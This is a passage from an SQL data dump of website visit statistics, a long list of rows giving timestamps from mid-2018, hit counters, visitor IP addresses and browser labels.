1,1,0,0,'54.36.148.214','other'),(253288,1527918587,1,1,0,0,'91.196.178.163','chrome'),(253289,1527918636,1,1,0,0,'54.36.148.239','other'),(253290,1527918910,1,1,0,0,'40.77.167.59','other'),(253291,1527918941,1,1,0,0,'54.36.148.165','other'),(253292,1527919170,1,1,0,0,'173.234.153.122','other'),(253293,1527919347,1,1,0,0,'95.163.255.99','other'),(253294,1527919503,1,1,0,0,'91.196.178.169','chrome'),(253295,1527919738,1,1,0,0,'54.36.149.101','other'),(253296,1527920048,1,1,0,0,'216.244.66.241','other'),(253297,1527920107,1,1,0,0,'62.205.134.182','other'),(253298,1527920136,1,1,0,0,'54.36.148.153','other'),(253299,1527920770,1,1,0,0,'54.36.148.157','other'),(253300,1527921066,1,1,0,0,'54.36.149.98','other'),(253301,1527921071,1,1,0,0,'54.36.149.87','other'),(253302,1527921112,1,1,0,0,'141.8.142.74','other'),(253303,1527921571,1,1,0,0,'54.36.149.72','other'),(253304,1527921828,1,1,0,0,'54.36.148.114','other'),(253305,1527921930,1,0,1,0,'66.249.64.30',''),(253306,1527921999,1,1,0,0,'54.36.148.146','other'),(253307,1527922042,1,1,0,0,'54.36.148.166','other'),(253308,1527922049,1,1,0,0,'54.36.149.64','other'),(253309,1527922480,1,1,0,0,'91.209.11.236','other'),(253310,1527922562,1,1,0,0,'66.249.70.29','chrome'),(253311,1527922668,1,1,0,0,'40.77.167.59','other'),(253312,1527922776,1,0,1,0,'66.249.64.29',''),(253313,1527922826,1,1,0,0,'216.244.66.241','other'),(253314,1527922883,1,1,0,0,'54.36.148.216','other'),(253315,1527923001,1,1,0,0,'8.29.198.25','other'),(253316,1527923518,1,0,1,0,'66.249.64.28',''),(253317,1527923569,1,1,0,0,'54.36.149.70','other'),(253318,1527923679,1,1,0,0,'40.77.167.99','other'),(253319,1527923706,1,1,0,0,'62.205.134.182','other'),(253320,1527924177,1,1,0,0,'54.36.148.44','other'),(253321,1527924427,2,2,0,0,'54.36.148.152','other'),(253322,1527924474,1,0,1,0,'66.249.64.28',''),(253323,1527924931,1,1,0,0,'54.36.149.83','other'),(253324,1527924977,1,1,0,0,'54.36.149.54','other'),(253325,1527925460,1,1,0,0,'54.36.148.81','other'),(253326,1527925777,1,1,0,0,'54.36.148.144','other'),(253327,1527926133,1,1,0,0,'54.36.148.67','other'),(253328,1527926909,1,1,0,0,'199.58.86.211','other'),(253329,1527927262,1,1,0,0,'54.36.148.136','other'),(253330,1527927308,1,1,0,0,'62.205.134.182','other'),(253331,1527927686,1,1,0,0,'207.241.232.48','other'),(253332,1527928083,1,1,0,0,'54.36.149.106','other'),(253333,1527928322,1,1,0,0,'8.29.198.27','other'),(253334,1527928418,1,1,0,0,'216.244.66.241','other'),(253335,1527928539,1,1,0,0,'54.36.149.89','other'),(253336,1527928697,1,1,0,0,'54.36.148.156','other'),(253337,1527928751,1,1,0,0,'54.36.149.35','other'),(253338,1527929176,1,1,0,0,'54.36.148.129','other'),(253339,1527929235,1,1,0,0,'54.36.148.100','other'),(253340,1527929357,1,1,0,0,'95.163.255.4','other'),(253341,1527929467,1,1,0,0,'54.36.148.36','other'),(253342,1527929721,1,1,0,0,'54.36.148.222','other'),(253343,1527929840,1,1,0,0,'54.36.148.86','other'),(253344,1527929845,1,1,0,0,'178.154.200.41','other'),(253345,1527930248,1,1,0,0,'54.36.149.6','other'),(253346,1527930448,1,1,0,0,'216.244.66.241','other'),(253347,1527930484,3,3,0,0,'141.8.142.74','other'),(253348,1527930909,1,1,0,0,'62.205.134.182','other'),(253349,1527931350,1,1,0,0,'54.36.148.239','other'),(253350,1527932117,1,1,0,0,'54.36.148.10','other'),(253351,1527932186,1,1,0,0,'54.36.148.237','other'),(253352,1527932270,1,1,0,0,'54.36.149.99','other'),(253353,1527932360,1,1,0,0,'54.36.149.43','other'),(253354,1527933000,1,1,0,0,'54.36.148.117','other'),(253355,1527933153,1,1,0,0,'54.36.148.131','other'),(253356,1527933162,1,1,0,0,'216.244.66.241','other'),(253357,1527933292,1,1,0,0,'54.36.148.184','other'),(253358,1527933834,1,1,0,0,'8.29.198.25','other'),(253359,1527933851,1,1,0,0,'54.36.148.94','other'),(253360,1527934082,1,1,0,0,'54.36.149.87','other'),(253361,1527934506,1,1,0,0,'62.205.134.182','other'),(253362,1527934691,1,1,0,0,'54.36.149.102','other'),(253363,1527934716,1,1,0,0,'54.36.148.140','other'),(253364,1527934989,1,1,0,0,'54.36.148.215','other'),(253365,1527935279,1,1,0,0,'54.36.148.251','other'),(253366,1527935950,1,1,0,0,'216.244.66.241','other'),(253367,1527936196,1,1,0,0,'141.8.142.74','other'),(253368,1527936716,1,1,0,0,'54.36.148.219','other'),(253369,1527936778,1,1,0,0,'54.36.149.75','other'),(253370,1527936902,1,1,0,0,'207.46.13.111','other'),(253371,1527937002,1,1,0,0,'54.36.149.64','other'),(253372,1527937302,1,1,0,0,'54.36.148.41','other'),(253373,1527937308,1,1,0,0,'54.36.148.31','other'),(253374,1527937392,1,1,0,0,'141.8.142.74','other'),(253375,1527938028,2,2,0,0,'216.244.66.241','other'),(253376,1527938109,1,1,0,0,'62.205.134.182','other'),(253377,1527938251,1,1,0,0,'66.249.75.30','chrome'),(253378,1527938539,1,1,0,0,'178.154.171.88','other'),(253379,1527939080,2,0,2,0,'66.249.69.199',''),(253380,1527939154,1,1,0,0,'8.29.198.25','other'),(253381,1527939950,1,1,0,0,'54.36.148.227','other'),(253382,1527940033,1,1,0,0,'107.167.104.189','other'),(253383,1527940173,1,1,0,0,'54.36.149.24','other'),(253384,1527940433,1,1,0,0,'54.36.149.107','other'),(253385,1527940544,1,1,0,0,'54.36.148.148','other'),(253386,1527940790,1,1,0,0,'54.36.148.38','other'),(253387,1527940918,1,1,0,0,'54.36.149.13','other'),(253388,1527941709,1,1,0,0,'62.205.134.182','other'),(253389,1527942523,1,1,0,0,'54.36.148.247','other'),(253390,1527942812,1,0,1,0,'66.249.75.29',''),(253391,1527942917,2,2,0,0,'95.67.80.108','chrome'),(253392,1527942976,1,1,0,0,'91.209.11.236','other'),(253393,1527943035,1,1,0,0,'54.36.149.91','other'),(253394,1527943072,1,1,0,0,'141.8.142.74','other'),(253395,1527943210,1,1,0,0,'54.36.148.117','other'),(253396,1527943344,1,0,1,0,'66.249.75.28',''),(253397,1527943459,2,2,0,0,'216.244.66.241','other'),(253398,1527943577,1,1,0,0,'54.36.148.162','other'),(253399,1527943738,1,1,0,0,'54.36.148.204','other'),(253400,1527944130,1,1,0,0,'54.36.148.251','other'),(253401,1527944504,3,3,0,0,'95.67.80.108','chrome'),(253402,1527944660,1,1,0,0,'8.29.198.27','other'),(253403,1527944693,2,2,0,0,'91.196.178.104','chrome'),(253404,1527944772,1,1,0,0,'216.244.66.241','other'),(253405,1527944792,1,1,0,0,'54.36.149.17','other'),(253406,1527945097,1,1,0,0,'54.36.148.147','other'),(253407,1527945103,1,1,0,0,'91.121.87.144','chrome'),(253408,1527945290,1,1,0,0,'54.36.148.32','other'),(253409,1527945307,1,1,0,0,'62.205.134.182','other'),(253410,1527945673,1,1,0,0,'54.36.149.26','other'),(253411,1527945730,1,1,0,0,'54.36.148.154','other'),(253412,1527946122,3,3,0,0,'95.67.80.108','chrome'),(253413,1527946285,1,1,0,0,'54.36.149.94','other'),(253414,1527946397,1,1,0,0,'54.36.149.19','other'),(253415,1527946682,1,1,0,0,'216.244.66.241','other'),(253416,1527947028,1,1,0,0,'54.36.148.204','other'),(253417,1527947167,1,1,0,0,'54.36.148.156','other'),(253418,1527947583,1,1,0,0,'54.36.149.48','other'),(253419,1527947647,1,1,0,0,'91.196.178.135','chrome'),(253420,1527947780,1,1,0,0,'54.36.148.194','other'),(253421,1527948102,1,1,0,0,'54.36.149.107','other'),(253422,1527948275,1,1,0,0,'178.154.171.88','other'),(253423,1527948413,1,1,0,0,'54.36.148.17','other'),(253424,1527948909,1,1,0,0,'62.205.134.182','other'),(253425,1527948972,1,1,0,0,'54.36.148.191','other'),(253426,1527949170,1,1,0,0,'66.249.69.195','chrome'),(253427,1527949252,1,1,0,0,'54.36.148.52','other'),(253428,1527949625,1,1,0,0,'178.154.171.88','other'),(253429,1527949837,1,1,0,0,'54.36.149.105','other'),(253430,1527949998,1,1,0,0,'8.29.198.27','other'),(253431,1527950009,1,1,0,0,'37.110.129.83','firefox'),(253432,1527950069,1,1,0,0,'193.106.30.99','firefox'),(253433,1527950074,1,1,0,0,'54.36.148.200','other'),(253434,1527950094,1,1,0,0,'54.36.148.95','other'),(253435,1527950124,1,0,1,0,'66.249.69.199',''),(253436,1527950262,1,1,0,0,'54.36.149.74','other'),(253437,1527950316,1,1,0,0,'54.36.149.12','other'),(253438,1527951150,1,1,0,0,'89.222.164.14','msie'),(253439,1527951166,1,1,0,0,'54.36.149.75','other'),(253440,1527951526,1,1,0,0,'95.67.80.108','chrome'),(253441,1527951786,1,1,0,0,'54.36.149.76','other'),(253442,1527951870,1,1,0,0,'54.36.148.240','other'),(253443,1527951878,1,1,0,0,'54.36.148.56','other'),(253444,1527952045,1,1,0,0,'54.36.149.17','other'),(253445,1527952508,1,1,0,0,'62.205.134.182','other'),(253446,1527952725,1,1,0,0,'47.96.233.90','other'),(253447,1527953434,1,1,0,0,'54.36.148.234','other'),(253448,1527954535,1,1,0,0,'54.36.149.14','other'),(253449,1527955023,1,0,1,0,'66.249.69.199',''),(253450,1527955169,1,1,0,0,'54.36.148.58','other'),(253451,1527955312,1,1,0,0,'207.241.232.47','other'),(253452,1527955504,1,1,0,0,'8.29.198.26','other'),(253453,1527955505,1,1,0,0,'178.154.171.88','other'),(253454,1527955863,1,1,0,0,'54.36.148.95','other'),(253455,1527955865,1,1,0,0,'216.244.66.241','other'),(253456,1527955994,1,1,0,0,'54.36.148.207','other'),(253457,1527956099,1,1,0,0,'54.36.148.244','other'),(253458,1527956106,1,1,0,0,'62.205.134.182','other'),(253459,1527956925,1,1,0,0,'46.48.13.161','chrome'),(253460,1527957162,1,1,0,0,'54.36.148.123','other'),(253461,1527957293,1,1,0,0,'54.36.148.105','other'),(253462,1527958083,1,1,0,0,'54.36.148.134','other'),(253463,1527958974,1,1,0,0,'54.36.149.98','other'),(253464,1527959132,1,1,0,0,'141.8.142.74','other'),(253465,1527959282,1,1,0,0,'54.36.148.177','other'),(253466,1527959706,1,1,0,0,'62.205.134.182','other'),(253467,1527960218,1,1,0,0,'95.221.50.166','msie'),(253468,1527960282,1,1,0,0,'54.36.148.153','other'),(253469,1527960374,1,1,0,0,'54.36.148.84','other'),(253470,1527960422,2,2,0,0,'178.154.171.88','other'),(253471,1527960525,2,2,0,0,'95.67.80.108','chrome'),(253472,1527960819,1,1,0,0,'54.36.148.225','other'),(253473,1527960836,1,1,0,0,'8.29.198.27','other'),(253474,1527960958,1,1,0,0,'54.36.148.145','other'),(253475,1527961189,1,1,0,0,'54.36.148.63','other'),(253476,1527961203,1,1,0,0,'54.36.149.69','other'),(253477,1527961388,1,1,0,0,'54.36.149.107','other'),(253478,1527961487,1,1,0,0,'54.36.149.10','other'),(253479,1527961735,1,1,0,0,'141.8.142.74','other'),(253480,1527961967,1,1,0,0,'54.36.148.219','other'),(253481,1527961992,1,1,0,0,'54.36.148.157','other'),(253482,1527962494,1,1,0,0,'54.36.148.133','other'),(253483,1527962801,1,1,0,0,'54.36.149.18','other'),(253484,1527962884,1,1,0,0,'34.207.246.101','other'),(253485,1527962978,1,0,1,0,'66.249.69.201',''),(253486,1527963035,1,1,0,0,'54.36.148.184','other'),(253487,1527963211,1,1,0,0,'54.36.148.231','other'),(253488,1527963288,1,1,0,0,'54.36.148.147','other'),(253489,1527963307,1,1,0,0,'62.205.134.182','other'),(253490,1527963967,1,1,0,0,'54.36.149.89','other'),(253491,1527964664,1,1,0,0,'54.36.148.126','other'),(253492,1527965091,1,1,0,0,'66.102.9.40','chrome'),(253493,1527965123,1,1,0,0,'34.207.246.101','other'),(253494,1527965129,1,1,0,0,'54.36.149.3','other'),(253496,1527965130,1,1,0,0,'46.133.242.99','chrome'),(253497,1527965282,1,1,0,0,'54.36.148.95','other'),(253498,1527965443,1,1,0,0,'54.36.148.156','other'),(253499,1527965537,1,1,0,0,'207.46.13.67','other'),(253500,1527965565,1,1,0,0,'54.36.148.64','other'),(253501,1527965639,1,1,0,0,'54.36.148.131','other'),(253502,1527966336,1,1,0,0,'54.36.148.141','other'),(253503,1527966337,1,1,0,0,'8.29.198.25','other'),(253504,1527966496,1,1,0,0,'54.36.149.73','other'),(253505,1527966754,1,1,0,0,'52.0.26.44','other'),(253506,1527966909,1,1,0,0,'62.205.134.182','other'),(253507,1527967196,4,4,0,0,'95.67.80.108','chrome'),(253508,1527967426,1,1,0,0,'54.36.148.210','other'),(253509,1527967459,1,1,0,0,'37.53.122.153','firefox'),(253510,1527967694,1,1,0,0,'54.36.149.88','other'),(253511,1527968061,1,1,0,0,'207.46.13.7','other'),(253512,1527968160,1,1,0,0,'178.154.171.88','other'),(253513,1527968268,1,1,0,0,'141.8.142.74','other'),(253514,1527968297,1,1,0,0,'52.0.26.44','other'),(253515,1527968298,1,1,0,0,'54.36.148.219','other'),(253516,1527968361,1,1,0,0,'95.67.80.108','chrome'),(253517,1527968390,1,1,0,0,'54.36.148.128','other'),(253518,1527968686,1,1,0,0,'54.36.148.192','other'),(253519,1527968727,1,0,1,0,'66.249.69.195',''),(253520,1527968769,1,1,0,0,'54.36.148.129','other'),(253521,1527969208,1,1,0,0,'54.36.148.138','other'),(253522,1527969285,1,1,0,0,'95.67.80.108','chrome'),(253523,1527969365,1,1,0,0,'54.36.148.139','other'),(253524,1527969446,1,1,0,0,'141.8.142.74','other'),(253525,1527969724,1,1,0,0,'54.36.148.164','other'),(253526,1527969730,1,1,0,0,'54.36.148.64','other'),(253527,1527969901,2,2,0,0,'54.36.148.216','other'),(253528,1527969919,1,1,0,0,'34.207.246.101','other'),(253529,1527970073,1,1,0,0,'54.36.148.251','other'),(253530,1527970176,1,1,0,0,'54.36.148.33','other'),(253531,1527970186,1,1,0,0,'54.36.148.43','other'),(253532,1527970207,1,1,0,0,'54.36.148.66','other'),(253533,1527970383,2,2,0,0,'95.67.80.108','chrome'),(253534,1527970507,1,1,0,0,'62.205.134.182','other'),(253535,1527970706,1,1,0,0,'54.36.149.103','other'),(253536,1527970787,1,1,0,0,'141.8.142.74','other'),(253537,1527971006,1,1,0,0,'54.36.149.10','other'),(253538,1527971240,1,1,0,0,'54.36.148.154','other'),(253539,1527971304,1,1,0,0,'54.36.148.180','other'),(253540,1527971458,1,1,0,0,'54.36.149.8','other'),(253541,1527971595,1,1,0,0,'54.36.148.140','other'),(253542,1527971667,1,1,0,0,'8.29.198.27','other'),(253543,1527972235,1,1,0,0,'188.163.0.196','other'),(253544,1527972483,1,1,0,0,'216.244.66.241','other'),(253545,1527972712,1,1,0,0,'54.36.148.78','other'),(253546,1527973043,1,1,0,0,'54.36.148.76','other'),(253547,1527973056,1,1,0,0,'54.36.148.176','other'),(253548,1527973770,1,1,0,0,'207.46.13.4','other'),(253549,1527973801,1,1,0,0,'216.244.66.241','other'),(253550,1527974081,2,2,0,0,'54.36.149.97','other'),(253551,1527974109,1,1,0,0,'62.205.134.182','other'),(253552,1527974306,1,1,0,0,'54.36.149.40','other'),(253553,1527974634,1,1,0,0,'54.36.149.23','other'),(253554,1527974769,1,0,1,0,'66.249.75.30',''),(253555,1527975348,1,1,0,0,'54.36.149.49','other'),(253556,1527975476,1,1,0,0,'54.36.148.77','other'),(253557,1527975550,1,1,0,0,'54.36.148.251','other'),(253558,1527975878,1,1,0,0,'216.244.66.241','other'),(253559,1527976201,1,1,0,0,'54.36.148.196','other'),(253560,1527976278,1,1,0,0,'54.36.149.79','other'),(253561,1527976601,1,1,0,0,'54.36.149.73','other'),(253562,1527976720,1,1,0,0,'92.112.229.70','chrome'),(253563,1527976770,1,1,0,0,'54.36.148.121','other'),(253564,1527977176,1,1,0,0,'8.29.198.26','other'),(253565,1527977477,1,1,0,0,'54.36.148.117','other'),(253566,1527977516,1,1,0,0,'54.36.149.37','other'),(253567,1527977711,1,1,0,0,'62.205.134.182','other'),(253568,1527977713,1,1,0,0,'54.36.148.97','other'),(253569,1527977741,1,1,0,0,'95.67.80.108','chrome'),(253570,1527978459,1,1,0,0,'54.36.148.72','other'),(253571,1527978482,1,1,0,0,'54.36.148.196','other'),(253572,1527978915,1,1,0,0,'54.36.148.186','other'),(253573,1527979220,1,1,0,0,'54.36.148.229','other'),(253574,1527979554,1,1,0,0,'216.244.66.241','other'),(253575,1527979619,1,1,0,0,'54.36.148.242','other'),(253576,1527980116,1,1,0,0,'91.209.11.236','other'),(253577,1527980272,1,1,0,0,'54.36.148.20','other'),(253578,1527980573,1,1,0,0,'46.133.231.18','chrome'),(253579,1527980865,1,1,0,0,'95.216.10.20','other'),(253580,1527980895,1,1,0,0,'54.36.148.150','other'),(253581,1527980955,1,1,0,0,'157.55.39.35','other'),(253582,1527980978,1,1,0,0,'54.36.148.215','other'),(253583,1527981189,1,1,0,0,'54.36.148.125','other'),(253584,1527981307,1,1,0,0,'62.205.134.182','other'),(253585,1527981790,1,1,0,0,'141.8.142.74','other'),(253586,1527982418,1,1,0,0,'54.36.148.55','other'),(253587,1527982500,1,1,0,0,'8.29.198.25','other'),(253588,1527982813,1,1,0,0,'54.36.148.115','other'),(253589,1527982830,1,1,0,0,'54.36.148.74','other'),(253590,1527982969,1,1,0,0,'95.67.80.108','chrome'),(253591,1527983132,1,0,1,0,'66.249.75.29',''),(253592,1527983377,1,1,0,0,'178.154.171.88','other'),(253593,1527983430,1,1,0,0,'54.165.59.7','other'),(253594,1527983744,1,1,0,0,'54.36.148.229','other'),(253595,1527984057,6,6,0,0,'95.67.80.108','chrome'),(253596,1527984330,1,1,0,0,'54.36.148.231','other'),(253597,1527984346,1,1,0,0,'34.201.101.166','other'),(253598,1527984498,2,2,0,0,'141.8.142.74','other'),(253599,1527984698,1,1,0,0,'54.36.148.149','other'),(253600,1527984700,1,1,0,0,'54.36.148.57','other'),(253601,1527984896,1,1,0,0,'54.36.148.31','other'),(253602,1527984906,1,1,0,0,'62.205.134.182','other'),(253603,1527984974,3,3,0,0,'95.67.80.108','chrome'),(253604,1527985638,1,1,0,0,'54.36.148.138','other'),(253605,1527985707,1,1,0,0,'54.36.149.75','other'),(253606,1527985830,1,1,0,0,'54.36.148.152','other'),(253607,1527985893,3,3,0,0,'95.67.80.108','chrome'),(253608,1527985983,1,1,0,0,'54.36.148.33','other'),(253609,1527986083,1,0,1,0,'66.249.75.28',''),(253610,1527986424,1,1,0,0,'54.36.148.190','other'),(253611,1527986586,1,1,0,0,'54.36.148.224','other'),(253612,1527986662,3,3,0,0,'178.33.23.156','other'),(253613,1527986831,3,3,0,0,'95.67.80.108','chrome'),(253614,1527986846,1,1,0,0,'52.90.228.194','other'),(253615,1527986891,1,1,0,0,'54.36.149.44','other'),(253616,1527987375,1,1,0,0,'54.36.148.124','other'),(253617,1527987699,2,2,0,0,'216.244.66.241','other'),(253618,1527987845,8,8,0,0,'95.67.80.108','chrome'),(253619,1527987951,1,1,0,0,'54.36.148.177','other'),(253620,1527988008,1,1,0,0,'8.29.198.27','other'),(253621,1527988051,1,1,0,0,'54.36.149.97','other'),(253622,1527988262,1,1,0,0,'95.163.255.93','other'),(253623,1527988445,1,1,0,0,'178.154.171.88','other'),(253624,1527988507,1,1,0,0,'62.205.134.182','other'),(253625,1527988512,1,1,0,0,'54.36.149.44','other'),(253626,1527988524,1,1,0,0,'54.36.149.73','other'),(253627,1527988721,1,1,0,0,'54.36.148.89','other'),(253628,1527988831,1,1,0,0,'216.244.66.241','other'),(253629,1527988918,3,3,0,0,'95.67.80.108','chrome'),(253630,1527989096,1,1,0,0,'95.163.255.96','other'),(253631,1527989123,1,1,0,0,'37.9.113.182','other'),(253632,1527989198,1,1,0,0,'54.36.148.12','other'),(253633,1527989214,1,1,0,0,'54.36.149.25','other'),(253634,1527989369,1,1,0,0,'54.36.148.149','other'),(253635,1527989589,1,1,0,0,'54.36.148.163','other'),(253636,1527989617,1,1,0,0,'54.36.148.147','other'),(253637,1527989827,1,1,0,0,'178.154.171.88','other'),(253638,1527989846,6,6,0,0,'95.67.80.108','chrome'),(253639,1527989887,1,1,0,0,'52.90.228.194','other'),(253640,1527990057,1,1,0,0,'54.36.148.215','other'),(253641,1527990560,1,1,0,0,'95.163.255.94','other'),(253642,1527990850,1,1,0,0,'178.154.171.88','other'),(253643,1527990918,2,2,0,0,'95.67.80.108','chrome'),(253644,1527991131,1,1,0,0,'54.36.148.159','other'),(253645,1527991610,1,1,0,0,'54.36.148.20','other'),(253646,1527991845,15,15,0,0,'88.198.136.83','other'),(253647,1527991856,10,10,0,0,'95.67.80.108','chrome'),(253648,1527992020,1,1,0,0,'54.36.149.25','other'),(253649,1527992107,1,1,0,0,'62.205.134.182','other'),(253650,1527992315,1,1,0,0,'54.36.148.119','other'),(253651,1527992372,1,1,0,0,'54.36.148.60','other'),(253652,1527992612,1,1,0,0,'54.36.148.198','other'),(253653,1527992717,1,1,0,0,'54.36.148.162','other'),(253654,1527992909,1,1,0,0,'54.36.148.133','other'),(253655,1527992919,3,3,0,0,'95.67.80.108','chrome'),(253656,1527993100,1,1,0,0,'34.201.101.166','other'),(253657,1527993335,1,1,0,0,'8.29.198.25','other'),(253658,1527993652,1,1,0,0,'180.76.15.9','other'),(253659,1527993729,1,1,0,0,'141.8.142.74','other'),(253660,1527993830,1,1,0,0,'54.36.149.87','other'),(253661,1527993843,4,4,0,0,'95.67.80.108','chrome'),(253662,1527993863,1,1,0,0,'54.36.149.11','other'),(253663,1527993957,1,0,1,0,'66.249.75.29',''),(253664,1527994333,1,0,1,0,'66.249.69.195',''),(253665,1527994499,1,1,0,0,'54.36.148.19','other'),(253666,1527994506,1,1,0,0,'54.36.148.78','other'),(253667,1527994680,1,1,0,0,'54.36.148.160','other'),(253668,1527994868,1,1,0,0,'95.67.80.108','chrome'),(253669,1527995033,1,1,0,0,'216.244.66.241','other'),(253670,1527995619,1,1,0,0,'199.16.157.182','other'),(253671,1527995707,1,1,0,0,'62.205.134.182','other'),(253672,1527995830,3,3,0,0,'95.67.80.108','chrome'),(253673,1527996130,1,1,0,0,'95.163.255.94','other'),(253674,1527996295,1,1,0,0,'54.36.148.168','other'),(253675,1527996322,1,1,0,0,'52.90.228.194','other'),(253676,1527996943,1,1,0,0,'95.67.80.108','chrome'),(253677,1527997064,1,1,0,0,'178.154.171.88','other'),(253678,1527997170,1,1,0,0,'193.106.30.99','firefox'),(253679,1527997486,1,1,0,0,'54.36.148.122','other'),(253680,1527997902,1,1,0,0,'216.244.66.241','other'),(253681,1527997912,1,1,0,0,'54.36.148.47','other'),(253682,1527997918,1,1,0,0,'54.36.148.91','other'),(253683,1527998014,1,1,0,0,'54.36.148.239','other'),(253684,1527998349,5,5,0,0,'95.67.80.108','chrome'),(253685,1527998427,1,1,0,0,'54.36.148.169','other'),(253686,1527998826,1,1,0,0,'54.36.148.175','other'),(253687,1527998854,1,1,0,0,'8.29.198.27','other'),(253688,1527999175,1,1,0,0,'54.36.148.177','other'),(253689,1527999259,3,3,0,0,'95.67.80.108','chrome'),(253690,1527999308,1,1,0,0,'62.205.134.182','other'),(253691,1527999665,1,1,0,0,'141.8.142.74','other'),(253692,1527999979,1,1,0,0,'54.36.148.223','other'),(253693,1528000156,1,1,0,0,'54.36.148.183','other'),(253694,1528000417,1,1,0,0,'54.36.149.61','other'),(253695,1528000465,1,1,0,0,'54.36.148.121','other'),(253696,1528000526,2,2,0,0,'95.67.80.108','chrome'),(253697,1528000555,1,1,0,0,'54.36.149.65','other'),(253698,1528000661,1,1,0,0,'216.244.66.241','other'),(253699,1528000725,1,1,0,0,'54.36.148.78','other'),(253700,1528000827,1,1,0,0,'54.36.149.89','other'),(253701,1528000833,1,1,0,0,'54.36.149.37','other'),(253702,1528000923,1,1,0,0,'178.154.171.88','other'),(253703,1528001463,1,1,0,0,'54.36.149.80','other'),(253704,1528001777,5,5,0,0,'95.67.80.108','chrome'),(253705,1528001900,1,1,0,0,'92.112.229.70','chrome'),(253706,1528002462,1,1,0,0,'87.250.224.46','other'),(253707,1528002540,1,1,0,0,'54.36.148.221','other'),(253708,1528002908,1,1,0,0,'62.205.134.182','other'),(253709,1528003049,1,1,0,0,'54.36.149.55','other'),(253710,1528003352,8,8,0,0,'95.67.80.108','chrome'),(253711,1528003524,1,1,0,0,'141.8.142.74','other'),(253712,1528004170,1,1,0,0,'8.29.198.26','other'),(253713,1528004235,2,2,0,0,'216.244.66.241','other'),(253714,1528004270,1,1,0,0,'95.67.80.108','chrome'),(253715,1528004789,1,1,0,0,'54.36.149.68','other'),(253716,1528004810,1,1,0,0,'54.36.148.17','other'),(253717,1528005019,1,1,0,0,'54.36.148.38','other'),(253718,1528005090,1,1,0,0,'54.36.148.108','other'),(253719,1528005103,1,1,0,0,'54.36.148.106','other'),(253720,1528005366,1,1,0,0,'216.244.66.241','other'),(253721,1528005517,1,1,0,0,'141.8.142.74','other'),(253722,1528005664,1,1,0,0,'54.36.149.45','other'),(253723,1528005770,1,1,0,0,'54.36.149.82','other'),(253724,1528005884,1,1,0,0,'54.36.149.66','other'),(253725,1528006273,12,12,0,0,'95.67.80.108','chrome'),(253726,1528006437,1,1,0,0,'178.154.171.88','other'),(253727,1528006508,1,1,0,0,'62.205.134.182','other'),(253728,1528006590,1,1,0,0,'54.36.148.240','other'),(253729,1528007368,1,0,1,0,'66.249.69.199',''),(253730,1528007408,2,2,0,0,'95.67.80.108','chrome'),(253731,1528007464,1,1,0,0,'54.36.149.58','other'),(253732,1528007757,1,1,0,0,'54.36.148.119','other'),(253733,1528007873,1,1,0,0,'54.36.148.158','other'),(253734,1528007946,1,1,0,0,'54.36.149.82','other'),(253735,1528008178,1,1,0,0,'54.36.149.59','other'),(253736,1528008199,1,1,0,0,'194.187.170.105','other'),(253737,1528008323,1,1,0,0,'54.36.148.224','other'),(253738,1528008408,1,1,0,0,'216.244.66.241','other'),(253739,1528008800,1,1,0,0,'54.36.148.193','other'),(253740,1528008809,1,1,0,0,'54.36.148.223','other'),(253741,1528008931,2,2,0,0,'95.67.80.108','chrome'),(253742,1528009027,1,1,0,0,'54.36.148.216','other'),(253743,1528009272,1,1,0,0,'54.36.148.104','other'),(253744,1528009520,1,1,0,0,'216.244.66.241','other'),(253745,1528009676,1,1,0,0,'54.36.148.24','other'),(253746,1528009689,1,1,0,0,'8.29.198.25','other'),(253747,1528009704,1,1,0,0,'54.36.148.203','other'),(253748,1528010108,1,1,0,0,'62.205.134.182','other'),(253749,1528010500,1,1,0,0,'95.67.80.108','chrome'),(253750,1528010729,1,1,0,0,'54.36.148.86','other'),(253751,1528010864,2,2,0,0,'54.36.148.28','other'),(253752,1528010983,1,1,0,0,'54.36.149.1','other'),(253753,1528011040,2,2,0,0,'95.213.141.126','opera'),(253754,1528012352,1,1,0,0,'54.36.148.221','other'),(253755,1528012406,4,4,0,0,'95.67.80.108','chrome'),(253756,1528012637,1,1,0,0,'54.36.149.69','other'),(253757,1528012919,1,1,0,0,'54.36.149.96','other'),(253758,1528012973,1,1,0,0,'54.36.149.71','other'),(253759,1528013235,1,1,0,0,'54.36.148.28','other'),(253760,1528013327,1,1,0,0,'95.67.80.108','chrome'),(253761,1528013448,1,1,0,0,'54.36.148.177','other'),(253762,1528013707,1,1,0,0,'62.205.134.182','other'),(253763,1528014366,1,1,0,0,'54.36.149.96','other'),(253764,1528014378,1,1,0,0,'54.36.149.41','other'),(253765,1528014671,2,2,0,0,'95.67.80.108','chrome'),(253766,1528014880,1,1,0,0,'216.244.66.241','other'),(253767,1528014896,1,1,0,0,'178.154.171.88','other'),(253768,1528015000,1,1,0,0,'8.29.198.25','other'),(253769,1528015065,1,1,0,0,'54.36.148.89','other'),(253770,1528015239,1,1,0,0,'180.76.15.28','other'),(253771,1528015345,1,1,0,0,'54.36.149.55','other'),(253772,1528016051,5,5,0,0,'95.67.80.108','chrome'),(253773,1528016082,1,1,0,0,'54.36.149.83','other'),(253774,1528016183,1,0,1,0,'66.249.69.195',''),(253775,1528016245,2,2,0,0,'216.244.66.241','other'),(253776,1528016580,1,1,0,0,'95.163.255.94','other'),(253777,1528016802,1,1,0,0,'54.36.148.138','other'),(253778,1528016969,6,6,0,0,'95.67.80.108','chrome'),(253779,1528017028,1,1,0,0,'95.163.255.2','other'),(253780,1528017202,1,1,0,0,'95.221.150.193','msie'),(253781,1528017312,1,1,0,0,'62.205.134.182','other'),(253782,1528017669,1,1,0,0,'54.36.148.70','other'),(253783,1528017705,1,1,0,0,'54.36.149.91','other'),(253784,1528017928,5,5,0,0,'95.67.80.108','chrome'),(253785,1528018070,1,1,0,0,'54.36.148.93','other'),(253786,1528018238,1,1,0,0,'54.36.149.20','other'),(253787,1528018252,1,1,0,0,'54.36.148.146','other'),(253788,1528018330,1,1,0,0,'54.36.148.73','other'),(253789,1528018472,1,1,0,0,'54.36.149.0','other'),(253790,1528018475,1,1,0,0,'141.8.142.74','other'),(253791,1528019687,1,1,0,0,'216.244.66.241','other'),(253792,1528019923,3,3,0,0,'95.67.80.108','chrome'),(253793,1528020006,1,1,0,0,'54.36.149.48','other'),(253794,1528020108,1,1,0,0,'54.36.149.97','other'),(253795,1528020154,1,1,0,0,'54.36.149.71','other'),(253796,1528020255,1,1,0,0,'79.165.136.121','msie'),(253797,1528020304,1,1,0,0,'54.36.149.24','other'),(253798,1528020527,1,1,0,0,'8.29.198.25','other'),(253799,1528020650,1,1,0,0,'91.196.178.129','chrome'),(253800,1528020902,4,4,0,0,'95.67.80.108','chrome'),(253801,1528020908,1,1,0,0,'62.2